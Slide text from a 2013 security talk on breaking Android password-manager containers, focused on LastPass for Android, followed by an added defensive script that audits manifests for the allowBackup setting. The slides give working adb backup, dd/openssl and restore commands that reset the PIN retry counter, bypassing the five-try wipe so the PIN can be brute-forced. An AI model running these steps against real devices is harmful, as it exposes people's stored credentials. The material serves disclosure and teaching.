LastPass
• Personal solution (w/ enterprise option)
• Uses online sync
• Can be secured with a PIN
• Can wipe data after 5 false logons
• Restricts screenshots
https://lastpass.com/android
Mobile Fail ::: Cracking open “secure” Android Containers | Chris John Riley | 26.11.2013 | 69
Can store lastpass.com password
• So users don't need to type it EVERY time
• Reduces security
• Makes it usable!
Why store the PW?
mySecur3L@sTp@$$p@$$w0rd1sDAb0mb&&&:
Easy to remember. Impossible to type!
It's OK though
You can enable a PIN!
PIN Security
• Limited to 4 digits!
• “auto-wipe” data after 5 false logons
PIN == SECURE!
AndroidManifest.xml
AndroidManifest.xml
<application android:allowBackup="true">
Default: true
adb backup com.lastpass.lpandroid -f lp.ab
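A defender-side check for the exposure the slides above rely on, added here as an example and not part of the talk: it parses a decoded AndroidManifest.xml (assumed to be plain text, e.g. from the project source) and flags any app whose android:allowBackup is true or absent, since an absent attribute takes the platform default shown above.

```python
# Added example (not from the talk): audit decoded AndroidManifest.xml files for
# the allowBackup setting that lets "adb backup" export an app's private data.
# Assumes plain-text manifests, e.g. from the project source or an apktool dump.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ALLOW_BACKUP = "{%s}allowBackup" % ANDROID_NS  # namespaced attribute key

def allow_backup_state(manifest_xml: str) -> str:
    """Return "explicit-true", "explicit-false" or "absent" for <application>.

    An absent attribute means the platform default applies, which is true,
    so only "explicit-false" actually closes the backup path.
    """
    root = ET.fromstring(manifest_xml)
    app = root.find("application")
    if app is None:
        raise ValueError("manifest has no <application> element")
    value = app.get(ALLOW_BACKUP)
    if value is None:
        return "absent"
    return "explicit-true" if value.strip().lower() == "true" else "explicit-false"

def audit(manifests: dict) -> dict:
    """Map package name -> finding for a batch of {package: manifest_xml}."""
    findings = {}
    for pkg, xml in manifests.items():
        state = allow_backup_state(xml)
        if state == "explicit-false":
            findings[pkg] = "ok: allowBackup=false"
        elif state == "absent":
            findings[pkg] = "FAIL: allowBackup not set (defaults to true)"
        else:
            findings[pkg] = "FAIL: allowBackup=true"
    return findings

# Constructed sample manifests (hypothetical package names, not real apps).
_TMPL = ('<manifest xmlns:android="%s" package="%s">\n'
         '  <application android:label="Demo"%s/>\n</manifest>\n')
SAMPLES = {
    "com.example.opt_in": _TMPL % (ANDROID_NS, "com.example.opt_in", ' android:allowBackup="true"'),
    "com.example.absent": _TMPL % (ANDROID_NS, "com.example.absent", ""),
    "com.example.hardened": _TMPL % (ANDROID_NS, "com.example.hardened", ' android:allowBackup="false"'),
}

if __name__ == "__main__":
    for pkg, finding in audit(SAMPLES).items():
        print(pkg, "->", finding)
```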
What good is an .ab file?
Android Backup (.ab)
• zlib compressed (kinda)
• skip header (24 bytes)
• pipe to openssl w/ zlib support
dd if=dropbox.ab bs=24 skip=1 | openssl zlib -d > dropbox.tar
LPandroid.xml
• lastpass.com username
• lastpass.com password (encoded)
• PIN (encoded)
• Settings
• ...
<string name="reprompt_tries">0</string>
That looks interesting!
THEORY
if reprompt_tries < 5:
    prompt_for_pin()
else:
    drop_the_DBass()
end
Theory
• reprompt_tries used as a counter
• increases till it reaches 5
• Sounds reasonable
• edit the XML and restore it
• Let's set “reprompt_tries” to -9999 then ;)
Proposed Attack
• Backup app data
• Edit XML
• set “reprompt_tries” to -9999
• Repackage
• Restore
0 - adb backup com.lastpass.lpandroid -f lpass.ab
1 - dd if=lpass.ab bs=24 skip=1 | openssl zlib -d > lpass.tar
2 - tar -tf lpass.tar > lpass.list
3 - tar -xvf lpass.tar
4 - edit apps/com.lastpass.lpandroid/sp/LPandroid.xml
5 - star -c -v -f lpass_new.tar -no-dirslash list=lpass.list apps/
6 - dd if=lpass.ab bs=24 count=1 of=lpass_new.ab
7 - openssl zlib -in lpass_new.tar >> lpass_new.ab
8 - adb restore lpass_new.ab
Not the easiest process...
counter++
good news …
We get 10,000 tries
bad news …
We get 10,000 tries
Let’s make it easier